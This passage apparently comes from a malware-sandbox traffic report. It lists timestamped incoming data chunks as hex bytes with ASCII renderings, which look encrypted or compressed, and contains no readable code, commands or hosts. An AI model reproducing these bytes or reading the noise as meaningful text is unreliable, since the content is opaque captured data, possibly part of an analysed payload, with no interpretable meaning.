ab 6a 6f 64 86 f5 6b 2b 61 1f 86 b4 aa 64 be df 56 9c df 97 6e 10 a5 7d 28 54 14 7f 47 1b 6e a5 08 2a 59 4f e2 06 49 77 85 74 54 6f 82 9d 35 4f 21 16 2b 3a a3 35 0f 18 70 67 06 f2 b8 5c f6 5c 65 6e 3f 6f e6 2e 89 d0 50 Data Ascii: /%&lp6cNI2kEFPRr\|QX]%}W]Y?-~p2=ecx!j%+=JbLzsC-w* LpKT(raJ^(EDm?(IPlCui{F&Qjodk+adVn}(TGn*YOIwtTo5O!+:5pg\\en?o.P
2023-09-26 07:46:56 UTC	543	IN	Data Raw: 25 64 2c de 53 9f f1 dc 48 c4 1c 5e df 9f b2 ef 05 c1 48 7b 27 aa 8e 0c fd 89 af ce e0 da ef cd a7 6d eb b6 a4 81 fa 59 a2 bc a2 54 be df df e2 4f 8a 2f 0c aa 59 94 73 61 e2 c6 7f 45 26 19 5b 37 e3 2b 97 44 f2 46 b1 58 e4 c0 22 83 10 3e 27 0b 3a fb b4 3c 53 9d a6 e2 a2 41 5c 2e 86 d7 84 e7 bc 09 58 3a 80 6c fc fb 6a 40 fc 45 91 db 60 2c 19 58 92 1e c6 43 19 aa c7 96 22 ec 4a ab 18 63 5d 4e 6b c3 86 b7 8f 99 58 3c 25 69 26 4e 35 b2 59 5c 1c 7e fa ee cd d2 7f 84 48 31 b0 fc 69 c3 78 ea 2e ff 60 22 7a cf f6 11 d5 2c 67 e5 78 a3 26 79 0d 22 85 ee 7f b1 b7 0a 18 25 e9 7b 62 92 59 ce 02 f9 58 63 d9 05 ed d0 88 7e 62 8e ae 6b 3f 49 25 49 40 d2 cf 6b 4d 4e 83 8b 88 86 66 7f 1b 4f a3 4f d5 6b cc 62 65 6e fd e7 21 ec d2 d3 b8 a2 59 96 d4 f9 6b 58 38 e7 de ce 36 42 Data Ascii: %d,SH^H{'mYTO/YsaE&[7+DFX">':<SA\.X:lj@E`,XC"Jc]NkX<%i&N5Y\~H1ix.`"z,gx&y"%{bYXc~bk?I%I@kMNfOOkben!YkX86B
2023-09-26 07:46:56 UTC	559	IN	Data Raw: 7b 27 ab b8 be 52 03 ea 07 95 7f 9c f0 e8 0d c6 b9 27 f3 69 db 67 52 09 ac 91 ae c9 36 64 5a 00 b7 b7 c8 1c 68 bc a4 6d 17 41 40 46 dd d7 a5 4d 82 a1 f2 2f 8f d3 6e df 74 b1 05 2d c2 d5 1e c7 88 09 f4 d3 43 fd b4 dd 7d 26 ab 9d b4 da e0 cc 8a 61 6e 76 13 2c a1 d9 77 55 f6 1c 9a db 6b 08 26 13 c5 1f 20 1e 68 70 18 7b 16 df 09 37 41 0a 60 63 7a 11 46 f2 96 9d 93 f2 72 d5 ff 95 22 6b 0a ee bc d3 92 06 ff 16 3e 79 37 a2 6a e9 6b 18 7b 23 f6 a6 c5 f4 c5 75 ec e2 b7 fc 63 cf 24 de ee 89 9f 9a 5a 44 4b cd ef 37 ee 8c 75 98 bd 2b 18 de 95 1c be 1f e0 85 1a 5a cd 51 da 8b 67 5a 22 53 d0 c5 7e e0 74 76 97 77 2b e3 0f ad fc 01 59 f0 b8 d9 68 ae d4 0e eb a6 d9 86 24 98 fd 06 63 76 55 e6 0c 8a 07 f9 20 d6 f1 91 a1 a5 04 7b 92 59 2d 72 91 5c e8 c9 98 2d a7 a6 10 fa 6d Data Ascii: {'R'igR6dZhmA@FM/nt-C}&anv,wUk& hp{7A`czFr"k>y7jk{#uc$ZDK7u+ZQgZ"S~tvw+Yh$cvU {Y-r\-m
2023-09-26 07:46:57 UTC	575	IN	Data Raw: 3c 3b 4c 80 f7 ad 7a 69 5b c7 5f cf 50 65 0c 5d fc 44 7a b7 53 f8 a4 90 bc db eb c9 c7 f3 a7 04 ec 83 e7 eb d5 3f 77 98 af b3 a0 b5 43 8c bf 74 4e 78 cd d9 2d ad fc 54 89 fa dd 26 0f 10 79 0f eb ce a7 20 a3 e3 7f 43 d3 a3 57 8e e6 b0 ba d8 1d ae fa 1f e7 c8 d1 62 af e7 64 13 3b 53 6c 0f 09 60 a7 9b 60 8b fd 3b 7e 30 06 25 c2 14 cb 25 13 13 f1 1e 01 64 fb ce fc 67 cd e0 cc 9e 9a 4b db 4d f5 35 33 85 95 b8 a2 c9 2c a0 b2 40 15 0b d2 44 9e d7 e0 4a 6c 70 18 f2 a0 b5 5c 4e 74 10 26 04 48 c9 46 f2 c5 48 0b 18 c7 46 73 de ae ad 4f 1e da e4 90 e0 47 ed 49 5d ca 5d 1f 60 ce 40 5c 06 f9 29 3b f0 48 f0 4d 44 65 2c 7e aa a0 5b 08 9a 9c a7 b0 5a 2a 47 a5 43 5e c3 94 bd 69 24 23 cc 27 78 46 ca 58 fb 22 83 19 62 4d 02 12 b6 4a 59 aa 11 96 99 c5 45 97 f4 87 04 ea e8 0c Data Ascii: <;Lzi[_Pe]DzS?wCtNx-T&y CWbd;Sl``;~0%%dgKM53,@DJlp\Nt&HFHFsOGI]]`@\);HMDe,~[Z*GC^i$#'xFX"bMJYE
2023-09-26 07:46:57 UTC	591	IN	Data Raw: 18 f2 8a db 62 7b b1 c5 60 0b c6 81 81 2c 4c 0b 50 07 e7 02 7c 51 79 c4 df 56 e7 3d 95 8d fd 1d 39 05 0c 51 f7 c7 7f 92 8c f3 a5 7e 42 fe c9 0f a8 1f 48 03 3c 26 6c 33 00 9a 24 bf 26 e2 8a e3 94 c2 96 cb 1f fb 5c 26 00 27 6f 93 0b 0c 58 8d 9b 74 ab a8 f4 4f 4f 32 c1 e0 ab 4c 38 b0 fb 86 1e 31 77 81 6b 9d 15 a0 36 6e 47 26 76 8b 22 b8 6f ce 9a 90 db ee d9 a4 23 9d aa 71 65 49 0b 3e 4e 8a be 32 17 24 7b 97 6d a6 ce 00 d5 9d 08 a9 0c 9c a7 a6 47 79 46 ae f8 f2 0c ea c4 47 2f 4c 0b a5 96 9e 53 18 0d 20 e8 54 01 36 0f a4 e0 4e db c9 98 39 16 70 ed e3 e6 fc 6d fd 13 dd dd d5 13 88 28 38 62 b0 4c 70 18 f2 4b da 05 e7 b6 f5 eb 4d ce 8b 87 33 24 73 d9 7b 85 a9 be 39 21 03 9d 1f 2f 38 10 a8 e9 1d af 4c 9d 75 1f 5d dd e4 35 43 4e 64 bc 15 09 c9 ba 10 cc 80 37 a5 24 Data Ascii: b{`,LP\|QyV=9Q~BH<&l3$&\&'oXtOO2L81wk6nG&v"o#qeI>N2${mGyFG/LS T6N9pm(8bLpKM3$s{9!/8Lu]5CNd7$
2023-09-26 07:46:57 UTC	607	IN	Data Raw: f1 ba 04 2d c7 14 0d c8 01 69 18 93 53 18 0f 20 f4 18 41 21 e6 9a 84 a7 72 81 91 89 96 6f 11 11 ec b3 a6 3b 8e db 56 ae c9 91 5e 5d aa 72 17 46 18 f2 76 37 1f 29 04 05 e5 fb 25 fd b9 a2 4c 95 dd e9 01 2a 7c 51 e9 aa cf ec ba 7f 94 8b f5 1d 39 bb c5 95 dc e3 9b e2 62 5e f6 a7 f8 24 9d 10 cd 10 cc 5b 0b a5 24 0b 88 24 33 24 d6 05 e4 e9 55 38 1d 8d a0 7a 52 ec 38 0f 48 9e 6e 10 58 fb e0 7c 39 c4 f3 0d 95 e5 5f a6 df f8 61 00 cf 90 98 f3 02 30 2d ad c1 9d 4f 80 6e d6 85 13 3e f1 14 45 e4 94 a7 5f 14 c5 a4 b7 bd 81 6f cb 03 11 17 ab 0a 6e 19 fb d4 a3 d6 d8 ba 46 5d 28 e8 ae 83 e9 ff a6 47 aa 4a 22 b6 b2 ed 52 9a 14 f6 f6 b6 f4 92 a9 a3 68 e7 73 fc df 7a 92 79 0d 2e 41 e7 72 56 76 ab 38 aa d9 e0 7e 26 9d a7 38 a9 6c d0 47 66 d1 4d e4 ef 90 27 7b 0d 3b a6 14 e1 Data Ascii: -iS A!ro;V^]rFv7)%L*\|Q9b^$[$$3$U8zR8HnX\|9_a0-On>E_onF](GJ"Rhszy.ArVv8~&8lGfM'{;
2023-09-26 07:46:57 UTC	623	IN	Data Raw: c3 91 b8 d6 af 5f b4 de 76 a1 9a 90 e5 79 9f cd 9d 76 59 89 e6 c7 8e b7 40 f1 39 6e 66 cb e8 a0 9d dd 56 5f dd 5c 51 39 96 d8 56 4f 4e 0b 86 dd b6 b2 50 5a c8 2f 1f d9 a5 b3 e7 e0 d2 e3 47 81 fb 5e a0 a6 70 25 ee c7 1d 61 86 92 08 fa 17 b3 7d 1f d6 e7 22 eb f0 7b b9 80 91 9b a5 f6 6c 7f 9a fb 52 33 61 aa 8a 73 81 4a 2f fd 5e f2 c5 b2 52 d4 2f 27 f9 b8 fd 0f b0 e1 6c 43 79 ef d2 e2 c6 86 c9 9a 96 a5 55 85 70 c2 b0 a3 ad 5f 56 f0 70 77 64 3c 33 a5 4c c2 1c 9a 9c ca 31 c2 44 0a aa 44 52 db 2c ee 8d 60 ea a0 95 bf c0 f3 a7 0b 5f c5 74 ae 25 ba 62 f5 e6 88 36 6a 66 88 ca b9 e1 6f ab 31 71 ad fc ea 07 95 7f df 8f a4 79 f2 02 b6 39 6f db 13 eb 48 e4 0d 54 8e e6 8c c0 70 36 4c 1d 94 d9 30 2e da f8 41 bc e9 5e a3 8a ae 8c 19 bf a6 47 aa 0f 6c 13 41 ed 42 da 14 f6 Data Ascii: _vyvY@9nfV_\Q9VONPZ/G^p%a}"{lR3asJ/^R/'lCyUp_Vpwd<3L1DDR,`_t%b6jfo1qy9oHTp6L0.A^GlAB
2023-09-26 07:46:57 UTC	639	IN	Data Raw: 10 5d d9 6a f5 dc f2 41 43 4f 6e 34 6b 80 67 df b6 39 65 f3 ae f6 a7 04 e0 04 47 5b 3c 0d 9f c4 b2 59 20 4e 3b 64 47 72 12 d2 43 08 2d 24 0b a8 2c 98 31 a4 ec f7 06 06 eb ce f2 2a 16 98 95 1b b4 4b ad 71 19 0e c3 f5 20 f1 f8 91 a1 a5 2b 56 92 59 12 2e ef 7c e8 a1 e9 56 af a6 47 91 42 cd c9 79 36 0a 3c 95 08 cb 9f 4c 18 64 2f 44 83 66 fc 67 72 d7 43 95 06 d7 66 65 6e 4b bd 90 c8 8c ad 38 09 1d 9a db 6b 3a 62 6f b6 1f 20 f2 94 8f e7 79 0e df d8 85 49 0a 60 0a 0e c3 ae e0 ac b5 ef 6f 8d 2a ff 91 03 25 0a f2 8f 77 53 57 16 8a 42 c3 c8 5d 77 07 d7 6d 73 1b 1e 53 c0 f4 48 73 b4 0f 8f 46 c3 22 b6 98 29 73 5b 6d 26 7f 62 ae 77 5c d1 c4 10 57 50 e7 e0 1c d4 5b 26 b9 a8 81 6c 8b 93 51 4e 47 f2 9a c9 66 40 4c 3b 60 0d 03 67 a5 21 75 74 44 67 9e 3c 6e 85 b3 6d bd 6e Data Ascii: ]jACOn4kg9eG[<Y N;dGrC-$,1Kq +VY.\|VGBy6<Ld/DfgrCfenK8k:bo yI`o%wSWB]wmsSHsF")s[m&bw\WP[&lQNGf@L;`g!utDg<nmn
2023-09-26 07:46:57 UTC	655	IN	Data Raw: 9f 80 83 8a 20 35 c5 75 54 a8 c8 da 2f ba 9e 21 a6 39 0e c2 82 dc 53 5e c9 31 c5 57 b5 1b 94 0b fa 03 fe 2c c8 f2 e2 b6 70 96 00 07 b8 a8 26 9c 46 9a 15 92 b3 84 37 06 00 81 96 a1 91 42 21 5b 08 ef 6f 77 c3 70 63 14 1a 39 9c ea 25 65 0f 5f a2 4e 20 3a b9 cd 3a f3 9a 41 3e e1 f1 45 03 96 48 d4 50 5a e0 6f 1c ee e2 4d 5a 62 e5 70 92 c5 19 9e 92 cb 16 ee 2f cf ea a1 4b 79 5e 32 5a 2f 7e da 84 7b 54 11 04 19 12 01 c8 87 c4 eb ab d2 fc 41 00 2d c2 ac b2 14 4d f9 f1 80 a8 e7 86 36 7d 33 bb 21 8f da 66 ae ea 20 ba 26 22 e5 61 1e 72 ec a0 f8 13 9e b2 10 b7 19 e7 f0 2c b3 a0 f3 f4 ee c2 d3 e8 57 81 cd 25 fb 02 a2 fc d2 2c 1c bc 90 72 7c 2a 07 78 53 3a fa 6a b8 01 a0 e9 1d 96 79 bd fd e0 28 00 92 66 d7 df e0 c5 7d 0d 60 b7 5a b8 57 7b 0c 05 df 40 72 63 65 52 c5 b7 Data Ascii: 5uT/!9S^1W,p&F7B![owpc9%e_N ::A>EHPZoMZbp/Ky^2Z/~{TA-M6}3!f &"ar,W%,r\|*xS:jy(f}`ZW{@rceR
2023-09-26 07:46:57 UTC	671	IN	Data Raw: 47 04 df 2d a8 76 06 29 80 36 9a e0 70 25 86 00 6b 65 6e ed b1 86 21 52 2b f2 21 a0 6a 20 e6 9f da f8 8b 10 a5 f6 11 75 a0 dc 68 13 c4 9b 0f 0e 89 bd 00 fd b9 35 83 71 1e 5e 1b 32 95 fb e8 53 b0 95 b9 35 fe 94 6a 23 2d 8f 4b be ef d4 ca 65 1b 3c 95 a7 c5 9c e8 bd 70 1f 1b eb 0a 0c da c9 83 5e 90 72 3d 38 a3 f5 12 e9 2e fa e5 3e af d8 92 24 d2 34 87 7e 44 8d 9b 78 85 c2 e3 fd e5 3d 14 ae 67 d0 80 77 35 47 54 fe 1d 00 45 8e b2 69 c3 c2 d0 2f 27 9f dd 66 2c e0 9a 90 cc 5a 98 4c 5c f5 91 9e 5e ac c5 e9 cc c9 0e 7b a1 cd d1 16 97 e1 38 05 e2 3b 61 e7 05 89 8a 60 b8 ed 0d a3 79 37 c3 cc 4b ec 37 23 02 c5 5e 63 fc 0f 87 a0 03 20 c4 e2 8b 62 91 d3 e1 1e ef 89 33 05 e8 5b d1 b9 91 53 d2 d0 35 1a 1d 05 87 ec 60 09 93 b7 5e f6 c7 a8 c1 07 a0 fa a5 f4 39 89 00 fe 04 Data Ascii: G-v)6p%ken!R+!j uh5q^2S5j#-Ke<p^r=8.>$4~Dx=gw5GTEi/'f,ZL\^{8;a`y7K7#^c b3[S5`^9
2023-09-26 07:46:57 UTC	687	IN	Data Raw: ee ce 95 12 fa 99 95 4c e4 db d0 36 23 64 d3 f8 48 48 7e d4 49 4e 11 b5 1b 98 84 af d3 53 47 61 68 b0 ec 94 47 12 cc 5c b0 08 04 2d c2 9d bb 23 b8 b9 9f 9c d8 de 56 69 78 b7 46 26 8f 63 20 07 32 b9 87 28 aa 05 e8 0b 21 50 39 91 7a 52 13 3f d8 ed 7a 99 45 7f 29 d8 9b 1e 5f ba 81 9b 0c ae a7 4e 36 ed 5c c0 7e 9c d4 b6 72 d5 bb 14 de ad 28 34 fa d4 09 8e e9 1d 4d c3 20 de df 5e 55 85 79 c6 be 34 ca 5b 81 99 a1 82 74 03 33 a0 ae c8 ff 65 d6 13 9c 68 e7 ff 6e 08 b0 f2 45 b2 d0 a4 e1 21 6a cf 50 ab d0 63 34 45 6d ae 25 89 57 5a c9 67 2e 4c 33 64 72 f7 f4 cb d3 89 d4 25 fc 69 c3 9e 34 c3 01 9f dd e7 f1 cf 9a 90 e3 dd 65 83 36 6e 53 67 f2 54 f8 06 c3 cd dd 6e 5e 32 17 62 92 33 56 2e 0d 1a af a1 fe 15 2f 4e 24 44 86 dd f2 70 08 ea 87 e4 d0 91 90 fe f1 86 74 18 79 Data Ascii: L6#dHH~INSGahG\-#VixF&c 2(!P9zR?zE)_N6\~r(4M ^Uy4[t3ehnE!jPc4Em%WZg.L3dr%i4e6nSgTn^2b3V./N$Dpty
2023-09-26 07:46:57 UTC	703	IN	Data Raw: 21 8a 9a 40 44 55 dd fa e1 21 e1 32 cf ca df 08 a9 6e 04 1e 62 45 1a e0 c1 71 54 0d 96 1a d7 47 97 fc 06 04 7b 52 89 91 4a c9 b4 31 73 61 22 f1 60 83 76 13 e0 90 1e 9a d7 3f 5d 66 d5 90 06 f9 84 84 39 1a e5 e9 dd 31 17 99 31 14 56 08 cc a9 32 bb 2d fa 63 1e 71 1f 72 b4 04 2d b6 02 7c c1 82 8e 19 59 67 93 f4 e5 14 de 33 14 78 18 ec 4e 63 65 1b 9c 28 ed ec 29 b0 eb a2 e3 5b 38 5e 90 84 8a 95 d1 46 e6 6f af f3 e9 14 b0 a1 16 3d 04 ea 01 45 c0 47 c0 0e 01 14 ec 65 2b 09 a3 75 6f cc f6 e3 4f 98 dc 1c d1 0d 39 37 a3 e1 23 97 94 f0 ba 09 94 0a 77 8a f4 f1 fe 48 02 32 24 50 d6 8b d0 60 a8 12 f4 7c 38 41 b3 8f 0a 7d ad 66 2c 94 2d 58 9c b7 f1 4c cc 82 f1 2e 51 7e c1 97 f4 b4 f9 84 06 f3 ca 37 19 cc b4 ce 4a d1 f2 a7 aa 96 1a 54 8f 57 14 a0 1e 60 09 19 78 24 97 11 Data Ascii: !@DU!2nbEqTG{RJ1sa"`v?]f911V2-cqr-\|Yg3xNce()[8^Fo=EGe+uoO97#wH2$P`\|8A}f,-XL.Q~7JTW`x$
2023-09-26 07:46:57 UTC	719	IN	Data Raw: 83 90 72 a1 31 ad ad 68 43 95 e6 3c 4d dc 17 bc c7 fe c0 d6 1e dd ec 61 73 c0 b3 b7 b1 f0 49 e8 9b 14 73 f8 47 a0 a7 3e ff 71 9e 9b e1 df 04 c3 68 d7 96 40 6b e8 df 0b 6b 64 72 fc 12 c0 6e 8d 9f 74 5f 6e 43 8b 58 98 c1 e3 d7 4c 74 01 80 42 1e 3d 4f 81 67 bd 75 e3 ff 95 b8 d9 89 15 9d 0a eb ce 13 da 30 10 df 54 d5 3c 49 07 ac ad 8e b3 6c c0 bf bd 28 87 e5 ea d8 61 ce 46 56 11 f8 28 83 28 a3 a6 47 99 c3 d1 f8 b6 8f 68 d6 9d b4 c7 8a 09 04 e2 ee f7 0d a4 75 95 43 7b 4d c2 ef c5 9c 36 38 fd 5a 52 17 2d aa 31 a7 50 9e db 56 7b 86 ff 91 ef 21 36 18 5d 9b 8c 47 33 6e 97 8a 0b 60 0b 4d 44 4e 34 85 69 55 a8 cd 32 6a 51 2e ac b0 68 ef 57 7d 3d 16 88 c6 ec c8 37 1f b5 c0 98 73 4b 75 63 dd 77 80 0f 2f 41 13 c0 b8 e3 28 b5 66 ae 9c 5c 9f 98 5f 05 1d cf 15 0b 96 34 12 Data Ascii: r1hC<MasIsG>qh@kkdrnt_nCXLtB=Ogu0T<Il(aFV((GhuC{M68ZR-1PV{!6]G3n`MDN4iU2jQ.hW}=7sKucw/A(f\_4
2023-09-26 07:46:57 UTC	735	IN	Data Raw: 9a 56 4f a5 c9 ea 11 c5 2d 55 e5 b7 40 b6 c3 a2 73 43 aa d8 98 52 28 a7 04 88 28 20 fb ad 31 b2 10 f2 c0 cc 34 99 a5 5b 31 58 90 89 b7 a5 48 3b 68 e4 34 2e 78 51 2e 29 b0 6b e5 b6 84 bf ae 32 39 79 43 00 17 d0 c4 92 70 9c 7d da c9 7d 1d 08 fb d5 c1 55 03 2f 71 26 8b dc b8 1f 19 ff 56 81 69 cc 51 bf a3 36 12 c3 6a ea 22 f7 22 fc 2e 42 f9 73 c0 55 21 82 db 86 8b 49 db 4f bf 08 33 7f e1 7a c9 c2 ad 5c fd a9 22 94 38 18 07 9d 15 85 ad fe 12 98 db d6 a5 c7 12 46 be 32 6d d8 ff 72 89 63 24 18 ec 31 58 34 a6 19 1a cf 9b 6c b6 fa c8 a2 ab a6 cc ed d3 56 9d e5 57 7b 49 e5 a1 46 4f 70 93 d2 a8 e3 86 66 79 20 32 24 04 23 07 69 b3 9a 91 fd f6 0d 65 0b 5d bf fe 91 cf 27 dd 51 d2 57 5e 9b 5f 7c 39 7c 93 bc 6f b6 a8 6d 4d 8f bb 7f f2 8f 07 0d 4f be d4 8e 82 eb 97 55 ae Data Ascii: VO-U@sCR(( 14[1XH;h4.xQ.)k29yCp}}U/q&ViQ6j"".BsU!IO3z\"8F2mrc$1X4lVW{IFOpfy 2$#ie]'QW^_\|9\|omMOU
2023-09-26 07:46:57 UTC	751	IN	Data Raw: b4 22 b7 71 19 4a 07 ef 48 48 f5 7a 7d 40 94 86 c2 b1 74 a2 dd 5c b1 98 5c 84 d2 ab af 2a 64 22 8e 73 04 35 c2 14 f6 20 c1 c5 45 8b 25 ba 7a 99 89 3b b8 53 9f 8d b9 a6 1f 80 6e 76 28 c1 f8 d0 52 35 5c f8 5d 9e aa 6d a4 fe 91 f8 b0 f6 6c 70 93 34 c0 7e 91 76 c0 07 60 0b c6 02 1f ad 9b 2e 9d ac 06 5f 9c d4 d8 d9 46 e1 92 d9 95 68 f2 e2 c6 df 37 28 fb b5 0f 17 73 4b af 64 4e 0b 1d 7b 9c 75 48 fc 46 ad db 23 ec bd db 9a 5c 40 2a 18 55 d2 ee e3 d3 bd 04 0f 03 c0 95 88 9a 70 6f fb 80 bf 5f 6e 78 c1 91 49 1f 2d 33 96 29 03 33 cd da 7f 85 4f 21 ad 71 36 c7 14 71 ad 07 14 dc 85 a2 ca 71 84 a7 a5 ed 1a 1b 76 55 fb f4 2c 0f b7 0f 48 7e 9c ad 83 96 62 1b 5a cc 0d d9 b7 a9 f7 e9 ba c5 a6 47 9b 81 50 06 bc 57 7d 49 5c ba 42 0a c7 50 23 25 e9 6e d3 80 df 47 70 70 ed 07 Data Ascii: "qJHHz}@t\\d"s5 E%z;Snv(R5\]mlp4~v`._Fh7(sKdN{uHF#\@Upo_nxI-3)3O!q6qqvU,H~bZGPW}I\BP#%nGpp
2023-09-26 07:46:57 UTC	767	IN	Data Raw: 20 d9 95 88 c3 7e e0 05 de bd e5 2b 99 fa e5 49 c1 23 07 33 81 77 41 d3 43 81 bc f7 a6 a9 74 9e e7 2b bb 5c c4 69 22 f1 68 1c 9a 91 a0 2d 55 b4 a3 89 de 0b 5a 75 f8 06 cb 9a f5 d0 e7 44 44 a6 64 a6 ba 7d 50 80 1e 5e fe 15 0e 23 95 66 ce 50 fc 74 fc d2 3d 99 fa 7a 88 c1 c8 9d 53 18 05 98 8f d0 c3 25 8e da ef 75 93 10 62 f5 8a 05 65 1d a3 35 ac a4 62 24 a9 10 de d1 98 ef 5a f2 e7 b2 5e c1 99 32 60 99 cc b6 98 f4 39 11 94 86 cd fe d9 bf 7b d5 83 ba e9 2f b1 6d e8 b9 b7 57 16 e2 4d 13 1c ab e0 a2 d3 56 88 44 73 ae 3a 0b b7 79 f5 93 b2 fc cc 64 c4 34 50 17 19 5a 21 7f a0 5a 27 42 06 31 6b 42 3c 2b e1 21 6a 27 2b f9 79 fb 22 ff a8 be 97 03 91 3b c6 5c 20 3a f7 05 2e b0 68 88 c7 da 22 29 4e 69 c3 91 33 5c cc 69 22 f1 c0 4b 52 66 db 67 1c c9 90 80 aa 71 e9 08 42 Data Ascii: ~+I#3wACt+\i"h-UZuDDd}P^#fPt=zS%ube5b$Z^2`9{/mWMVDs:yd4PZ!Z'B1kB<+!j'+y";\ :.h")Ni3\i"KRfgqB
2023-09-26 07:46:57 UTC	783	IN	Data Raw: 3b 14 64 d3 3c 23 13 61 28 82 23 7f e0 28 a4 3e 23 b4 83 5b 3a 81 68 0f 05 07 b7 76 27 5a 51 26 57 65 e9 92 31 ce 5b 0a aa 2c ca 48 7a d8 ab 92 d0 72 1e 4d 40 1d a6 70 c6 2c 93 db d9 fd 6f 96 b5 d3 c7 3a 0b 9c 35 33 87 20 bc 7d 25 45 29 61 c3 91 53 ea ff ea fd f1 9e d6 65 e5 30 67 e0 5c 0b 89 20 86 0e a5 0f f9 48 cb 31 b1 4a d1 81 9d e7 a5 ba 33 fd a3 9d b9 fe 15 b3 59 32 02 d1 22 04 bc ec 3b c0 14 f6 48 c5 64 47 35 f7 2e 45 ed 03 8a cc ca 04 8f fb cb b1 11 48 20 20 70 f8 d0 6c eb a4 61 9b 51 57 d2 df c1 1b e9 8e 39 e1 31 19 a2 c6 37 77 44 19 e2 b7 d7 38 fd c5 36 c9 2a 0a 32 4e a1 83 04 a5 40 1e 94 aa 31 f6 02 02 ed 70 47 4b 9d 1b 66 44 1e 78 c0 b3 b7 af f8 8e f0 70 47 81 c0 b7 6c af 7b 10 ee 91 5c d8 ad 1e cc ab c7 15 31 6b c9 55 ad 6b 64 62 24 95 a4 a8 Data Ascii: ;d<#a(#(>#[:hv'ZQ&We1[,HzrM@p,o:53 }%E)aSe0g\ H1J3Y2";HdG5.EH plaQW917wD86*2N@1pGKfDxpGl{\1kUkdb$
2023-09-26 07:46:57 UTC	799	IN	Data Raw: 48 92 ed 90 55 5a 63 9d fc e1 ea 93 65 8e dd 7f 0a 50 3d ef d0 e6 e7 2d 14 a1 b4 46 69 fa 09 0b 60 0b 4d ca c5 36 c9 f0 9d 60 09 1a 7d 51 2e 27 0a 16 6c 68 75 d4 f6 dd 07 7c ce 0a 74 a5 ac e4 26 b7 7d a3 50 f4 14 b7 70 96 0d fb b3 d9 1c 1f 00 ef 9b 11 18 69 5b 0b aa c7 1b cf 8d eb d9 97 1f ab 64 f3 0a 8b a0 8f 2d 95 f7 ae 25 02 29 64 45 10 1e 87 95 86 49 bc 93 00 51 33 de df f2 27 81 9e 0e df 80 27 ed 41 ac ce 9a e4 cd 12 9b 43 ea b7 5a 30 66 bd 48 be 48 cd 35 e4 b1 25 c6 40 6d a6 82 46 f7 5c e8 a1 e8 e8 a7 a6 47 52 bd 1f 04 b0 07 df 29 47 7d 8e f9 ba 5c 53 84 af f2 53 ba 57 0b 1e a5 59 15 4c 11 74 e5 33 57 8f e6 1d 29 b8 ac 18 c6 9c 56 1b 17 39 45 93 5f f5 19 61 93 b7 b7 b9 6f 54 c2 0e e5 0b 9a 45 46 7a 89 4d 78 44 7f c1 68 a6 f4 27 8d 74 e6 a4 2f 07 e9 Data Ascii: HUZceP=-Fi`M6`}Q.'lhu\|t&}Ppi[d-%)dEIQ3''ACZ0fHH5%@mF\GR)G}\SSWYLt3W)V9E_aoTEFzMxDh't/
2023-09-26 07:46:57 UTC	815	IN	Data Raw: 48 be b5 b9 81 b9 12 08 90 0e 12 14 35 80 48 5e fe 43 65 25 83 02 05 25 8e c1 ab a6 87 18 9c db 58 cf d8 67 5c ee 8e d6 fd 34 5e d9 fa ca 62 0b 6b 0f 6f 26 f9 ed 15 cc 5d 43 aa dc 8a 93 a1 4b 41 c1 90 d0 fa a8 31 b3 93 0d 1e b8 8d 91 a5 2a c1 bb 81 45 46 c1 00 fc 11 93 72 5f 6c dc 63 4c a7 df e7 c2 82 dc 43 ea 45 7c 37 21 0c dc 6e 92 73 4b f6 d8 ce 7f 0d 14 fb 1f 47 b4 37 f5 cf 42 53 cc 17 ef 3d 0b 85 cb 51 cf 99 7d 5f ea df e1 d3 de 0c 4e ff bb da 14 ee b5 e4 f3 d5 68 18 3e 1f 57 57 88 8c d0 21 4d a4 be cb 5d dd 9e 3c e1 8e 60 f8 b3 01 16 90 fa 8d 47 d7 68 a9 d5 61 b3 2a 7e 04 de 6b c8 f7 a9 c5 0d 11 fb a0 9d 39 74 3b a6 ba c5 19 40 b7 ff 5a e5 67 d3 54 2a c3 31 05 be 8f 68 22 97 56 9b 02 4c 18 96 9f 27 6d 71 f3 68 02 d2 ac 9f e3 ce 1e 89 6e 02 a1 8e a5 Data Ascii: H5H^Ce%%Xg\4^bko&]CKA1EFr_lcLCE\|7!nsKG7BS=Q}_Nh>WW!M]<`Gha~k9t;@ZgT*1h"VL'mqhn
2023-09-26 07:46:57 UTC	831	IN	Data Raw: 29 82 93 51 ae b7 e2 48 b5 59 34 c2 f3 2c ee 46 97 77 43 83 a8 ad 03 96 3c 1a 73 f2 d8 16 50 0a 14 31 65 ab fb ee 8a 1b 0f fd 9b 71 f3 01 23 be 48 b7 23 12 65 c5 54 a2 ed 80 ce c3 dd a3 17 5e 8a ed a3 59 b8 ed 0d 68 85 4a fb d2 4b 89 f2 34 fe b3 23 b5 de ad 0f e3 0c 21 b8 d9 04 09 9b 65 48 96 e5 ae 21 07 65 09 a3 36 65 0e 65 53 12 85 a4 89 24 ef 26 1d 6d 05 f3 79 fe c7 9f ed b6 81 fd 0f 39 fd b9 79 40 75 ab 90 72 a1 e9 59 d1 53 b0 25 1c 32 f8 ba e8 1d 39 0d 36 b4 f9 a3 6b 92 48 b2 85 9b 4e 69 b0 0e 8f e0 a3 04 be 01 00 36 00 9a 9c b1 11 09 d2 0e 55 38 69 f0 5b cb 75 b0 b1 aa a1 88 d6 7f 83 43 dd 83 bf 25 a8 06 e5 49 b5 25 1b cd fb 48 41 c3 97 88 bc f7 59 78 17 2d 48 0c 40 27 ff 60 56 bb 17 30 65 6f a9 3c b1 4c 5c 76 55 a5 2e 04 8a fd b7 b7 0a aa 6f bb ce Data Ascii: )QHY4,FwC<sP1eq#H#eT^YhJK4#!eH!e6eeS$&my9y@urYS%296kHNi6U8i[uC%I%HAYx-H@'`V0eo<L\vU.o
2023-09-26 07:46:57 UTC	847	IN	Data Raw: c6 86 c8 5d 1f 5d 94 6c 73 4b f6 a5 c5 f4 48 f3 70 1f 48 07 33 a5 24 33 00 9a 9c 9d d9 80 5f 03 aa c7 96 c6 94 bd 54 f6 e0 21 6a 6e c3 f3 a7 25 dd 7c 6c 9f 25 02 1a f7 4a a6 df a4 7e 88 ca c7 97 77 43 c9 2d ad fc 68 c2 91 b8 58 01 9f dd 0f e9 ce 9a 91 27 98 95 4d 58 76 55 8f e0 8d 07 f8 40 48 f5 90 ad cd d1 63 82 59 45 47 c5 5c e8 a0 21 60 a7 a7 77 12 86 dc 31 b4 04 2c a2 14 f6 cb 01 4c 18 6b ac e7 86 66 fc df 47 26 8f da ef 4e 63 65 6e 76 ab 05 e8 5a a2 bc 29 19 9a db 56 91 5b 01 6e 12 a5 f6 6c 73 18 f2 4b 30 61 12 49 0e 60 0b c6 06 46 f2 c5 70 54 6f 8d 2f 7c 51 2e 